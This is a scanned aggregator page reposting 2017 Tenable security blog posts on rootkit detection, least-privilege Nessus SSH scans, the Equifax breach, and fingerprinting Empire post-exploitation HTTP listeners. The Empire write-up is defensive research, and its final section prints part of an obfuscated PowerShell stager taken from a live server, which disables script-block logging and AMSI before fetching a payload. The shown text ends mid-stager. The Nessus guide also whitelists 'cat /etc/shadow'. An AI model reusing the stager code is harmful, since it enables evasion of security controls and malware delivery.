tenable38.rssing.com
Open in
urlscan Pro
185.150.190.192
Public Scan
URL:
https://tenable38.rssing.com/chan-8418415/all_p34.html
Submission Tags: falconsandbox
Submission: On January 29 via api from US — Scanned from DE
Submission Tags: falconsandbox
Submission: On January 29 via api from US — Scanned from DE
Form analysis 5 forms found in the DOM
Name: hmsearch — GET
<form name="hmsearch" method="get">
<input type="text" name="q" id="cs-header-menu-search-form-input" placeholder="Type and press enter..." value="" onkeydown="return dogsearch_if13(document.hmsearch.q.value, document.hmsearch.stype.value, event.keyCode);">
<input type="text" name="dummy" style="visibility:hidden">
<select name="stype" style="visibility:hidden">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Name: searchbox_1 — GET
<form name="searchbox_1" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_1.q.value, document.searchbox_1.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_1.q.value, document.searchbox_1.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Name: searchbox_2 — GET
<form name="searchbox_2" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_2.q.value, document.searchbox_2.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_2.q.value, document.searchbox_2.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Name: searchbox_3 — GET
<form name="searchbox_3" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_3.q.value, document.searchbox_3.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_3.q.value, document.searchbox_3.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Name: searchbox_4 — GET
<form name="searchbox_4" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_4.q.value, document.searchbox_4.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_4.q.value, document.searchbox_4.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Text Content
WE VALUE YOUR PRIVACY
We and our partners store and/or access information on a device, such as cookies
and process personal data, such as unique identifiers and standard information
sent by a device for personalised ads and content, ad and content measurement,
and audience insights, as well as to develop and improve products.
With your permission we and our partners may use precise geolocation data and
identification through device scanning. You may click to consent to our and our
partners’ processing as described above. Alternatively you may click to refuse
to consent or access more detailed information and change your preferences
before consenting.
Please note that some processing of your personal data may not require your
consent, but you have a right to object to such processing. Your preferences
will apply to this website only. You can change your preferences at any time by
returning to this site or visit our privacy policy.
DISAGREEMORE OPTIONSAGREE
* Login
* Account
* Sign Up
* Home
* About Us
* Catalog
* Search
* Register RSS
* Embed RSS
* FAQ
* Get Embed Code
* Example: Default CSS
* Example: Custom CSS
* Example: Custom CSS per Embedding
* Super RSS
* Usage
* View Latest
* Create
* Contact Us
* Technical Support
* Guest Posts/Articles
* Report Violations
* Google Warnings
* Article Removal Requests
* Channel Removal Requests
* General Questions
* DMCA Takedown Notice
* RSSing>>
* Collections:
* RSSing
* EDA
* Intel
* Mesothelioma
* SAP
* SEO
* Latest
* Articles
* Channels
* Super Channels
* Popular
* Articles
* Pages
* Channels
* Super Channels
* Top Rated
* Articles
* Pages
* Channels
* Super Channels
* Trending
* Articles
* Pages
* Channels
* Super Channels
Switch Editions? German Edition (Deutsch)
Cancel
AddThis Sharing Buttons
Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintShare to
EmailEmailShare to PinterestPinterestShare to GmailGmailShare to
LinkedInLinkedInShare to Email AppEmail AppShare to TumblrTumblrShare to
MoreAddThis
English
RSSing.com
RSSing>> Latest Popular Top Rated Trending
Channel: Tenable Blog
SUBSCRIBE Remove ADS
NSFW?
Claim
0
Mark channel Not-Safe-For-Work? cancel confirm NSFW Votes: (0 votes)
Are you the publisher? Claim or contact us about this channel.
No ratings yet.
Showing article 661 to 680 of 1364 in channel 8418415
Channel Details:
* Title: Tenable Blog
* Channel Number: 8418415
* Language: eng
* Registered On: February 27, 2013, 4:19 am
* Number of Articles: 1364
* Latest Snapshot: January 19, 2022, 1:01 pm
* RSS URL: http://feeds.feedburner.com/tenable/qaxl
* Publisher: https://www.tenable.com/
* Description:
* Catalog: //tenable38.rssing.com/catalog.php?indx=8418415
Viewing all 1364 articles
First Page ... Page 32 Page 33 Page 34 Page 35 Page 36 ... Last Page
Browse latest View live
MR. ROBOT CLEANING HOUSE AT E-CORP
October 27, 2017, 6:00 am
Next Configuring Least Privilege SSH scans with Nessus
Previous Reaper IoT Botnet
0
0
Image may be NSFW.
Clik here to view.
The second episode of Mr. Robot finds Elliot starting his new job at E-Corp. As
he joins his new team and is looking to find a way to delay the shipment of all
the paper data to New York facility, Elliott runs into the normal corporate
middle management delays. He quickly realizes his first obstacle, William the
Technology Manager, is up to no good and is deploying Rootkits on phones and
selling the personal data collected. To circumvent this first obstacle, Elliot
breaks out a good tool called theHarvester, and then promptly calls the feds.
Watch out Evil Corp, Elliot is cleaning house, while trying to delay the stage
two attack.
THEHARVESTER
During a pentest, the security professionals go through a reconnaissance phase
where data on the target is collected. Having used theHarvester a few times
myself, I found that time spent collecting subdomains, email and SHODAN results
helps to really understand vantage points into the target for exploitation. In
this episode, Elliot uses the tail command to view the results of theHarvester
and get his manager's password. He reads the email and identifies that his
manager is using rootkits on the mobile devices. Elliot promptly notifies the
feds. E-Corp may not be Evil for long.
Image may be NSFW.
Clik here to view.
ROOTKITS
Rootkits on mobile devices, laptops, servers and other types of assets are often
hidden very well within the OS, thus making their discovery challenging, to say
the least. Tenable.io™ has very advanced technology developed in a series of
plugins to detect Malicious Processes, Malicious Content, Malicious File
Detection and support for Yara. By using the plugins and Yara rules shown below,
you can search your network for the rootkits or other malicious software.
* 52670|Web Site Links to Malicious Content
* 59275|Malicious Process Detection
* 59641|Malicious Process Detection: Potentially Unwanted Software
* 64687|Malicious Process Detection: APT1 Software Running
* 64788|Malicious Process Detection: Malware Signed By Stolen Bit9 Certificate
* 65548|Malicious Process Detection: User Defined Malware Running
* 71024|Web Site Hosting Malicious Binaries
* 71261|Linux Malicious Process Detection
* 71263|Mac OS X Malicious Process Detection
* 88958|Malicious File Detection: APT1 Software on System
* 88959|Malicious File Detection: Malware Signed By Stolen Bit9 Certificate
* 88960|Malicious File Detection: Invalid Directories
* 88961|Malicious File Detection
* 88962|Malicious File Detection: User Defined Malware
* 88963|Malicious File Detection: Potentially Unwanted Software
* 91223|Malicious Process Detection: User Defined Malware Running (Linux)
* 91224|Malicious Process Detection: User Defined Malware Running (Mac OS X)
* 91990|Malicious File Detection Using Yara
By searching for three terms “Malicious File, Malicious Process, and Hosting
Malicious,” you can easily locate all the plugins which provide indications of
rootkits in your network.
Image may be NSFW.
Clik here to view.
In my test data, you can see I have one system I need to investigate. The
plugins will return files and URLs to help you better understand and defend
against the malware or rootkit.
Image may be NSFW.
Clik here to view.
MODERN ATTACK SURFACE
The detection of rootkits was difficult when confined to managed devices, but
now that the modern IT landscape consists of web apps, containers, cloud
instances and IoT, the ability to detect rootlets becomes even more challenging.
Tenable.io is the first Cyber Exposure platform to provide you with holistic
visibility across your modern attack surface, allowing you to detect rootkits or
other malicious software on your network. Start a free 60-day trial of
Tenable.io for your organization today.
Image may be NSFW.
Clik here to view.
Search
RSSing.com
--------------------------------------------------------------------------------
CONFIGURING LEAST PRIVILEGE SSH SCANS WITH NESSUS
October 30, 2017, 6:43 am
Next The Equifax Breach – A Cyber WTF Moment
Previous Mr. Robot Cleaning House at E-Corp
0
0
Image may be NSFW.
Clik here to view.
Credentialed scans have long been advocated as the quickest and most accurate
way to perform a vulnerability assessment against any network. But like with all
things technology, it runs into two usual roadblocks: people and processes.
When the topic of credentialed network scans is discussed it inevitably leads to
questions such as, who is requesting access and why? What level of privileges is
needed and why? Which commands will be run and why? All legitimate questions
which should be rightly asked before granting access to any system. But the
back-and-forth between different teams typically leads to a long, drawn-out
process eventually resulting in either the requestor being denied access or
getting access to a limited account which may lead to incomplete scan results.
To help solve this problem, our customers have asked us to provide transparency
around which commands are run by a Nessus® scan, what privileges are required to
run the commands and if the commands failed, which Nessus plugins would fail as
a result. An additional requirement was to provide this information in an
easy-to-consume output format so that they can configure a scan account while
having the least privileges and still be able to perform a complete and accurate
scan.
With the recent release of Nessus 6.11, we are taking steps to address that
issue by releasing a beta feature which will allow our customers to do just that
across Tenable.io™ Vulnerability Management, Nessus and Security Center™.
REQUIREMENTS
* Nessus 6.11 or later, either standalone or managed by Tenable.io
Vulnerability Management or Security Center
* Scan Target Operating System
* CentOS, Redhat, Amazon Linux, SuSE, Ubuntu, Debian, HP-UX, Scientific
Linux, AIX, Oracle Linux, Gentoo.
SCAN CONFIGURATION
At a high level, the process can be summarized in five simple steps :
1. Configure a scan account to run with sudo privileges
2. Enable ‘Attempt Least Privilege’ preference in scan policy
3. Review plugin output of Nessus plugin IDs #102094 and #102095
4. Update /etc/sudoers file based on results on plugin #102094
5. Repeat Step 4, until commands which run with higher privileges are accounted
in /etc/sudoers file
STEP 1 : CONFIGURE USER TO RUN COMMANDS VIA SUDO
Log in to the system as the root user and create a normal user account. Run
visudo to edit the /etc/sudoers file, and add the commands the user is allowed
to run with sudo. In the example below I created a user ‘nessus_scan_account’
assigned it SUDOER User_Alias who can run the ‘/usr/bin/dmidecode’ command which
requires root privileges to run.
Image may be NSFW.
Clik here to view.
STEP 2. ENABLE ‘ATTEMPT LEAST PRIVILEGE’ CHECKBOX IN SCAN POLICY
Follow the below steps to enable ‘‘Attempt Least Privilege’ preference in the
scan policy.
Tenable.io Vulnerability Management & Nessus
Click Scans -> New Scan -> Advanced Scan -> Credentials -> SSH -> Attempt Least
Privilege
When this preference is enabled, Nessus plugins attempt to execute commands with
least privileges (i.e. without privilege escalation), and if the initial attempt
fails, it retries executing the command with privilege escalation. It also logs
commands which failed and succeeded with privilege escalation and reports the
information in two plugins (#102094, #102095) which will be discussed in the
next steps. As a result of running the same command twice, customers should note
the scans could run 10-30 percent slower according to our lab tests.
Image may be NSFW.
Clik here to view.
Security Center
For Security Center, follow the below screens to enable the preference.
Click Scans -> Policies -> Add -> Advanced Scan -> Authentication -> Attempt
Least Privilege
Image may be NSFW.
Clik here to view.
STEP 3 : REVIEW PLUGIN OUTPUTS
Once the scan finishes, review output of plugins #102094 and #102095 to
determine which plugins successfully ran with privilege escalation and which
plugins failed due to insufficient privileges.
SSH COMMANDS RAN WITH PRIVILEGE ESCALATION (#102095)
Plugin #102095 reports all plugins which ran with escalated privileges. The
plugin output is in YAML, and includes information about the account used,
plugin file name, id, name and the command it ran. This plugin will help users
verify only authorized commands are run with sudo privileges.
Image may be NSFW.
Clik here to view.
SSH COMMANDS REQUIRE PRIVILEGE ESCALATION (#102094)
Plugin #102094 reports all plugins which failed to run with escalated privileges
due to insufficient privileges. As was the case in the previous plugin, the
plugin output is in YAML to facilitate easier creation of /etc/sudoers file. It
includes information about the account used, plugin file name, id, name, and the
command it ran.
Customers should review the output of this plugin to fine tune the commands
which can be run with the sudo account. Note the command ‘cat /etc/shadow’
failed in the below example. We will resolve this issue in the next step.
Image may be NSFW.
Clik here to view.
STEP 4 : UPDATE /ETC/SUDOERS FILE
In the previous step, plugin #102094 reported execution of command ‘cat
/etc/shadow’ failed due to privilege escalation failure. We can easily resolve
this by adding ‘/bin/cat /etc/shadow’ as an allowed command to the SUDOER alias
we created earlier in /etc/sudoer file, which will allow the next scan to run
this command successfully with escalated privileges. You could also continue to
block certain privileged commands from running by not updating the /etc/sudoers
file and accepting the risk of certain vulnerabilities not being detected due to
incomplete information.
Image may be NSFW.
Clik here to view.
STEP 5 : REPEAT
To perform an accurate authenticated scan, repeat step four such that commands
that fail are accounted in the /etc/sudoers file.
At this point, one might wonder, “Why not just share a static list of ssh
commands with customers?” The reason is two-fold. First, we routinely add new
commands to our plugins, so there is a risk of a static file going stale. And
second, we don’t always know if a command will require admin privileges across a
wide variety of operating systems.
WRAP-UP
In this blog post, we demonstrated how a user can create a tailored Nessus scan
account to perform authenticated scans over SSH with the least privileges
required to perform the scan. Currently, the feature is supported on a limited
number of OSs, and we expect to roll out support for additional OSs over the
next few months. If you have feedback about the feature, please reach out to
Tenable™ support. We would love to hear from you.
Image may be NSFW.
Clik here to view.
THE EQUIFAX BREACH – A CYBER WTF MOMENT
October 30, 2017, 10:08 am
Next The Year of the Modern Attack Surface
Previous Configuring Least Privilege SSH scans with Nessus
0
0
Image may be NSFW.
Clik here to view.
Now that some time has passed since the news broke on the Equifax breach, we’ve
had some time to ascertain the facts, digest what happened and draw some
conclusions. It’s taken some time as for the first few weeks the company slowly
doled out bits and pieces of information.
For starters, it is not even remotely acceptable for a CEO of a tech company,
an information company, or any other company leveraging technology to be
clueless about his organization’s cyber exposure and technology risk. Former
Equifax CEO Richard Smith’s statement before Congress about the catastrophic
breach affecting 145 million Americans was dumbfounding. The company’s
willingness to blame the breach on a single engineer not acting quickly enough
to patch a known vulnerability can only be characterized as a total face-palm
moment. In fact, the whole Equifax explanation is such a long series of
face-palm moments that I now have a migraine.
Cyber 101 teaches us that security requires people, process and technology.
I won’t comment on the people side of this incident, since I don’t know them
personally.
There are clearly a series of technology failures. How did they operate with a
vulnerability scanner that they didn’t know was incapable of detecting these
highly publicized critical vulnerabilities? How did they not have the technology
to detect the incident between May 13th and July 30th, allowing 79 days of
active exfiltration of so much data?
And how do you implement processes where the entire cyber infrastructure of
Equifax and securing access to all of this incredibly sensitive information
about hundreds of millions of people boil down to one person? In what world
does this seem like a reasonable standard of care??
Why did the breach response process take so long? And why was their process so
poorly understood and coordinated across the executive team that doing the right
thing became effectively impossible? The company’s leadership not only showed a
blatant disregard for the securing the information they were responsible for
stewarding, they displayed a foundational lack of moral compass burying deep
within the fine print that potential breach victims were waiving their legal
rights to sue in exchange for finding out if their data was exposed and then
offering free identity theft protection that actually isn’t free after a year.
You don’t have to be a genius to realize that the cyber world is a nasty place.
Using technology of any kind isn’t risk-free. All organizations and their
leaders have a responsibility to understand what systems they rely on, where
they are exposed, and have plans for actively managing their risk. Breaches
will happen, even to good security programs and organizations that are going the
extra mile to protect themselves, their customers and the information they are
entrusted with stewarding.
Equifax just wasn’t one of those cases, not by a long mile.
Image may be NSFW.
Clik here to view.
THE YEAR OF THE MODERN ATTACK SURFACE
November 6, 2017, 11:41 am
Next Hiding Behind the APT Helplessness Defense...Really?
Previous The Equifax Breach – A Cyber WTF Moment
0
0
Image may be NSFW.
Clik here to view.
If there’s one thing 2017 has taught us so far, it’s that the attack surface has
changed. Cloud, containers, custom web apps, IoT, and OT are all part of the
milieu that’s forcing security teams to up their game.
Basic cyber hygiene is more important yet more challenging than ever. Consider
four of the year’s biggest security headlines:
* NotPetya– an aggressive worm using multiple exploits that
delivered destructionware encrypting the target’s data without the
possibility of recovery; NotPetya generated over $200 million in damage per
company to Merck, FedEx (TNT Express), Maersk, and possibly others
* Equifax– a catastrophic breach that compromised the sensitive personal
information of more than 100 million people, enabled by a known vulnerability
in the Apache Struts web application framework
* OT / ICS threats– an unprecedented series of recent threats to OT
infrastructure, including CrashOverride/Industroyer and the October 2017
DHS/FBI alert on an APT campaign targeting energy and other critical
infrastructure
* Reaper– a potentially massive new IoT botnet that’s one of the first to
exploit vulnerabilities in device firmware rather than brute-forcing
passwords, with the number of affected devices perhaps as large as one
million
If 2015 was the year of the endpoint, recent attacks make clear that 2017 is the
year of the modern attack surface. The wave of highly publicized breaches from
2013-2015, including Target, Home Depot, Anthem, and OPM, all targeted the
endpoint. But unlike the attacks of yesterday, the headlines of today involve
attacks against today's modern attack surface: cloud, web applications, IoT,
critical infrastructure, and more.
Securing the endpoint, while necessary, is no longer enough. The attack surface
has expanded.
Server and endpoint hardening, operational technology (OT) asset and
vulnerability detection, IoT discovery and hardening, container and web app
vulnerability identification and mitigation – these are all table stakes for
effectively managing cyber exposure. Attackers will always find the weak link,
so understanding and protecting what matters most across your entire attack
surface is essential.
It’s no different than managing basic physical security in your home. You
wouldn’t lock just the front windows in your house and ignore those in the back.
Locking every first-floor window and door when you leave home is minimum
acceptable security. Similarly, security teams require continuous visibility,
context, and insight into all assets. Focusing on server infrastructure leaves
blind spots in the cloud and containers. Focusing on endpoints leaves one
vulnerable to web app and IoT attacks. Focusing on IoT leaves the whole rest of
the environment a question mark.
And even seeing all your assets isn’t enough. Just as a police department must
distinguish between petty vandalism, a home invasion, and a riot when triaging
calls, security teams must understand which vulnerabilities and issues actually
create the most cyber risk for their business. Speed of visibility is helpful,
but without broader context and prioritization it’s useless. Imagine the police
treating graffiti as an urgent threat and racing through town with sirens
blaring. No security team wants to waste their time by racing mindlessly ahead.
Although we don’t know every detail of the Equifax breach, public reporting
suggests it was a disastrous example of poor vulnerability prioritization and
risk management. The company knew the Struts vulnerability existed in its web
apps, but for whatever reasons it didn’t act quickly or effectively enough to
protect the immensely sensitive data accessible through those apps. This is
exactly why full attack surface visibility and risk-based prioritization are
essential for managing cyber exposure.
Regulatory compliance and policy reporting are another reason security teams
need complete visibility and insight across assets. Security and compliance
teams often need to demonstrate compliance with PCI, HIPAA, CIS Critical
Security Controls, NIST CSF, ISO/IEC 27001/27001, or any number of other
frameworks. Without visibility into the entire computing environment, this is
often impossible or at best highly manual.
It’s not too late to avoid the next NotPetya or Equifax, but it means getting
serious about understanding your full environment – with all its dark corners,
unmanaged assets, and forgotten systems. Turning a blind eye or focusing on
silos won’t keep you safe.
Image may be NSFW.
Clik here to view.
HIDING BEHIND THE APT HELPLESSNESS DEFENSE...REALLY?
November 13, 2017, 5:39 am
Next Identifying Empire HTTP Listeners
Previous The Year of the Modern Attack Surface
0
0
Image may be NSFW.
Clik here to view.
Former Equifax CEO Richard Smith’s Congressional Testimony was a real WTF moment
for many of us who work in the cyber field. Last week, former Yahoo CEO Marissa
Mayer testified about Yahoo’s 2013 and 2014 data breaches, leaving us with
intentionally vague, if not misleading statements. Mayer asserted that in both
of the breaches,“Russian Intelligence Officers and state-sponsored hackers were
responsible for highly complex and sophisticated attacks on Yahoo’s systems.”
What we haven’t seen in Yahoo’s case is any further detailing of what these
"sophisticated attacks" actually looked like.
In cyber, details matter A LOT. We do forensic analysis and read through
numerous incident reports, gaining knowledge, identifying patterns and trying to
step up our game. We know that all threat actors, including government
intelligence services, cyber criminals, and hacktivists, readily use common
exploits and phishing techniques whenever possible. Why? Because among other
reasons, they're readily available at no cost and make attack attribution
harder.
In a vast supermajority of breaches, the victims were ultimately compromised by
the seemingly simple things. Equifax’s catastrophic breach occurred because they
failed to identify and patch a known vulnerability in their Apache Struts
implementation for which updates and workarounds were available. After one
quarter, they claim the incident has cost the company over $75M. On the last
earnings call, Merck’s CFO announced that Petya, which leveraged a known
vulnerability with readily available patches and workarounds, resulted in $135M
of lost revenue and $175M in additional cost. Home Depot, Target -- the list
goes on and on.
When breaches occur, we -- shareholders, customers, citizens, lawmakers -- start
looking for answers. It seems that many leaders are happy to claim that “an APT
did it” and “how are we supposed to protect ourselves from nation-state
adversaries?” These are perfect examples of learned or at least misleading
helplessness. We know perfect security doesn’t exist. What we are seeing,
however, is far from that -- organizations falling victim to simple exploits,
not sophisticated, super-advanced hacking techniques. Let’s be clear, state
actors may be behind an attack, but they're taking full advantage of
lackadaisical security practices to get in. The questions Congress should and
ultimately the courts will be asking ought to be less focused on who the
attackers were and more on how they got in. Were these organizations exercising
a reasonable standard of care in protecting themselves? Verizon, for example,
since the acquisition appears to be stepping up Yahoo's security posture.
The questions Congress should and ultimately the courts will be asking ought to
be less focused on who the attackers were and more on how they got in.
We can’t be lulled into a false sense of helplessness based on our worst fears.
When it boils down to it, it’s very rarely the most sophisticated of zero-day
exploits for which very little could have been done that’s tripping us up, it’s
the simple and seemingly easy stuff.
I'm frequently asked what organizations can do to protect themselves from APTs.
The first step is obvious -- do the basics really, really well. Know where you
have systems, and which ones you rely on. Know where they are exposed and
exercise good cyber hygiene practices in maintaining them. Use multi-factor
authentication pervasively and make sure tight controls are in place to manage
privileged accounts. Use any number of modern techniques to monitor for
intrusions. Doing the cyber basics well might not be sexy, but it is
foundational to defend against APTs and it makes a huge difference.
Good cyber hygiene makes a difference and is ultimately the reason why
organizations that run tight ships suffer far fewer intrusions, including fewer
intrusions from advanced threat actors.
Image may be NSFW.
Clik here to view.
IDENTIFYING EMPIRE HTTP LISTENERS
November 21, 2017, 10:06 am
Next The Bad, the Ugly and the Cyber Immoral - Thank you, Uber
Previous Hiding Behind the APT Helplessness Defense...Really?
0
0
Empire is a popular open source post-exploitation framework. The framework can
very roughly be broken down into two parts: agents and listeners. An agent is an
implant that lives on the victim’s computer. A listener resides on the
attacker’s command and control server and handles communication with the agent.
A lot of work has gone into making agents difficult to find. Less has been done
to hide listeners. In this write up, I point out mistakes that have been made in
Empire’s HTTP listeners and then look at some listeners found in the wild.
Empire has five different HTTP-based listeners. From a network point of view,
they’re similar in that a request to “/” results in a 404 Not Found error.
albinolobster@ubuntu:~$ curl -i http://192.168.1.204/
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: Microsoft-IIS/7.5
Date: Thu, 16 Nov 2017 21:36:21 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL
manually please check your spelling and try again.</p>
Perhaps that response doesn’t look interesting, but it’s enough to fingerprint
an Empire HTTP listener.
CREATING THE SHODAN FILTER
One of the important things to know about Empire is that it’s built on top of
Flask. Flask uses Werkzeug for some of its HTTP functionality. Empire’s
dependency on Werkzeug is immediately evident in the HTTP response because the
error message, “The requested URL was not found on the server. If you entered
the URL manually please check your spelling and try again” is hardcoded in
Werkzeug.
Punching the query title:”404 Not Found” +”Server:Wekzeug” into Shodan shows
that Werkzeug very reliably serves a 404 page that is 233 bytes. This gives us a
great starting point for finding Empire listeners on Shodan: title:"404 Not
Found" +"Content-Length: 233" yields ~24,000 entries. We can’t use the Server
field in the HTTP response because Empire allows the user to modify it.
Another important detail about Flask and Werkzeug is that they don’t support
HTTP 1.1. You can actually see in the server’s response that it starts by
declaring “HTTP/1.0”. However, Empire’s HTTP response contains a feature
introduced in HTTP 1.1. The Cache-Control field, originally included in RFC
2068, “Hypertext Transfer Protocol -- HTTP/1.1”, was introduced into Empire in a
commit to avoid caching. Empire isn’t the first or last HTTP server to backport
Cache-Control, but it does help us narrow the field a bit. The Shodan filter
title:"404 Not Found" +"Content-Length: 233" +"Cache-Control: no-cache,
no-store, must-revalidate" -"post-check=" -"pre-check=" -"private" has 406
results.
While we’re talking about RFC violations, it should be noted that use of the
Pragma field, also introduced in the caching commit, is not correct. According
to RFC 1945, “Hypertext Transfer Protocol -- HTTP/1.0”, use of no-cache with
Pragma is intended for HTTP requests only. Again, Empire is not the first to
ignore the RFC. In fact, Pragma: no-cache is widely used in HTTP server
responses. RFC be damned. However, Werkzeug doesn’t use it by default so
Empire’s usage helps narrow the field even further: title:"404 Not Found"
+"Content-Length: 233" +"Cache-Control: no-cache, no-store, must-revalidate"
-"post-check=" -"pre-check=" -"private" +"Pragma: no-cache" has 306 results.
There is one more RFC violation I want to point out, again from the caching
commit, and that is the use of the Expires field. Both HTTP 1.0 and 1.1 specify
that this field should contain a date. For example: Expires: Thu, 01 Dec 1994
16:00:00 GMT. Empire uses Expires: 0 which both RFCs specifically call out as
incorrect (although 1.0 says 0 should be accepted and 1.1 says it must be
accepted). The Shodan filter title:"404 Not Found" +"Content-Length: 233"
+"Cache-Control: no-cache, no-store, must-revalidate" -"post-check="
-"pre-check=" -"private" +"Pragma: no-cache" +"Expires: 0" has 301 results. It
should also be noted that Microsoft IIS servers generally don’t use Expires: 0.
Which means Empire’s default value of Server: Microsoft-IIS/7.5 isn’t a good
fit.
There is one more field that we know an Empire HTTP listener must have and
that’s the Server field. As previously mentioned, this field is user
configurable so you shouldn’t try to key off of the contents. But simply
requiring the field to be present narrows the results down to 298: title:"404
Not Found" +"Content-Length: 233" +"Cache-Control: no-cache, no-store,
must-revalidate" -"post-check=" -"pre-check=" -"private" +"Pragma: no-cache"
+"Expires: 0" +"Server:".
We have more or less exhausted what we know an Empire HTTP listener response
should contain. Now we need to add to the filter what we know it should not
contain. For example, Empire doesn’t serve up any fields with “X-” or
“Set-Cookie”. My final Shodan filter has 282 results: title:"404 Not Found"
+"Content-Length: 233" +"Cache-Control: no-cache, no-store, must-revalidate"
-"post-check=" -"pre-check=" -"private" +"Pragma: no-cache" +"Expires: 0"
+"Server:" -"X-" -"Set-Cookie:" -"Connection:" -"Etag" -"Last-Modified"
-"Accept-Ranges:" -"Access-Control".
ARE THOSE REALLY EMPIRE LISTENERS?
The logic behind the Shodan filter is fairly sound, but cautious readers should
be asking themselves, “How can you be sure all of the results are Empire
listeners?” You can’t be sure. Obviously, non-Empire servers could have the
exact same HTTP banner. However, there is one more mistake in Empire that will
allow us to confirm if a server is an Empire listener or not.
At the beginning of this write up, I made an HTTP request to “/” which resulted
in a 404 error response. This is because Empire hasn’t implemented a route for
“/”. However, Empire has implemented a route for literally everything else. For
example, the following request yields a 200 OK:
albinolobster@ubuntu:~$ curl -I http://192.168.1.204/theyregooddogsbrent
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 173
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: Microsoft-IIS/7.5
Date: Fri, 17 Nov 2017 14:03:20 GMT
On a normal server, “/” often maps to index.html, index.php, index.asp, etc. So
it’s pretty odd if you request “/” and get a 404 but request “/index.html” and
get a 200. Not only that, but the HTTP content for most 200 OKs is hardcoded in
Empire. Using this knowledge we can verify, with very little doubt, that a
server is an Empire listener.
albinolobster@ubuntu:~$ curl -I http://192.168.1.204/
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: Microsoft-IIS/7.5
Date: Fri, 17 Nov 2017 14:24:06 GMT
albinolobster@ubuntu:~$ curl -i http://192.168.1.204/index.html
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 173
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: Microsoft-IIS/7.5
Date: Fri, 17 Nov 2017 14:24:19 GMT
<html><body><h1>It works!</h1><p>This is the default web page for this
server.</p><p>The web server software is running but no content has been added,
yet.</p></body></html>
EMPIRE IN THE WILD
The Shodan filter seems to be quite accurate. Of the 282 servers listed on
Shodan, I only counted one false positive and one I wasn’t sure about among the
servers that are still reachable. I did find that some servers don’t serve up
the default page for index.html. For example, the following is part of the
Empire powershell stager implementation.
albinolobster@ubuntu:~$ curl http://xx.xx.xx.xx:8080/index.html
IF($PSVErsionTAble.PSVeRSiOn.MAjoR -Ge
3){$GPS=[rEf].AssEmBlY.GEtTYPe('System.Management.Automation.Utils')."GEtFiE`ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETVaLUE($NUll);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}Else{[SCRIptBlocK]."GetFIe`ld"('signatures','N'+'onPublic,Static').SETVAlue($NULL,(NEW-ObJeCt
CoLlECtionS.GeNeRIC.HashSet[striNG]))}[ReF].AssEmbLY.GEtTYPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFiELd('amsiInitFailed','NonPublic,Static').SEtVaLUE($nuLL,$tRUE)};};[SYSteM.NET.SErvICePOIntManaGER]::EXpeCT100ContINUe=0;$WC=New-ObJEcT
SYstem.NET.WEBClIENT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;
rv:11.0) like
Gecko';$Wc.HEAdErs.AdD('User-Agent',$u);$WC.ProxY=[SYsteM.NET.WebRequeSt]::DefauLtWebPRoxy;$WC.PRoxY.CreDeNTIAlS
= [SysteM.NET.CrEdenTiAlCaChE]::DEfaULtNEtWorkCredEnTiAls;$Script:Proxy =
